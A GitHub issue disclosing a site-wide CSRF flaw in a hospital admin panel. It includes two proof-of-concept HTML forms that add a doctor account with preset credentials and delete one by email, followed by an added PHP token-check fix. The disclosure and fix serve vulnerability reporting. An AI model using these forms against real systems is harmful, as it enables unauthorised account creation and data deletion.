CSRF in adding and deleting doctor
dhakalananda opened this issue · 0 comments
dhakalananda commented
Hi,
There is a site-wide CSRF vulnerability in every functionality.
Add Doctor
```html
<html>
  <body>
    <form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
      <input type="hidden" name="doctor" value="test" />
      <input type="hidden" name="special" value="Cardiologist" />
      <input type="hidden" name="demail" value="test@gmail.com" />
      <input type="hidden" name="dpassword" value="testtest" />
      <input type="hidden" name="cdpassword" value="testtest" />
      <input type="hidden" name="docFees" value="123" />
      <input type="hidden" name="docsub" value="Add Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
Delete Doctor
```html
<html>
  <body>
    <form action="http://localhost/admin-panel1.php" method="POST">
      <input type="hidden" name="demail" value="testbydhakalananda@gmail.com" />
      <input type="hidden" name="docsub1" value="Delete Doctor" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
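Both forms above succeed because the request carries nothing that a third-party page cannot supply. The following is an added example, not part of the original report or the project's code, of a synchronizer-token check that would reject them; it assumes the admin panel authenticates with a PHP session, and the `csrf_token` field and helper names are hypothetical.

```php
<?php
// Added example, not the project's code. Assumptions: the admin panel
// authenticates with a PHP session; the field name "csrf_token" and the
// helper names below are hypothetical.

// Defence in depth: keep the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to place inside every state-changing <form>.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_is_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected)
        && $expected !== '' && hash_equals($expected, $sent);
}

// Gate the two actions from the report before any database work happens.
$isPost = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';
if ($isPost && (isset($_POST['docsub']) || isset($_POST['docsub1']))) {
    if (!csrf_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The existing add-doctor / delete-doctor handling would continue here.
}
```

Because the report describes the problem as site-wide, the same check belongs in front of every state-changing handler, with `csrf_field()` emitted in each legitimate form.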